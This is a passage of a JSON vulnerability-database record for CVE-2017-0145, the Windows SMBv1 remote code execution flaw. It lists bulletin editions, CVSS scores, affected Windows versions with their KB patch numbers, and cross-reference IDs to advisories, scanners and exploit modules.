"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T08:48:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T08:48:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3177186", "KB4013429", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012214", "KB4012212", "KB3213986", "KB3205401", "KB4012213", "KB3212646", "KB3210720", "KB4012215", "KB4012217", "KB3205409", "KB4014077", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": 
"KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems 
Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 
x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T08:48:00", "differentElements": ["msAffectedSoftware"], "edition": 29}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T11:22:34", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": 
["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB3177186", "KB3212646", "KB4014077", "KB4012598", "KB4012606", "KB4012214", "KB4013429", "KB3210721", "KB4012215", "KB3213986", "KB4013198", "KB3205401", "KB3210720", "KB4012212", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": 
"", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", 
"kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T11:22:34", "differentElements": ["msAffectedSoftware"], "edition": 30}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T12:52:00", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
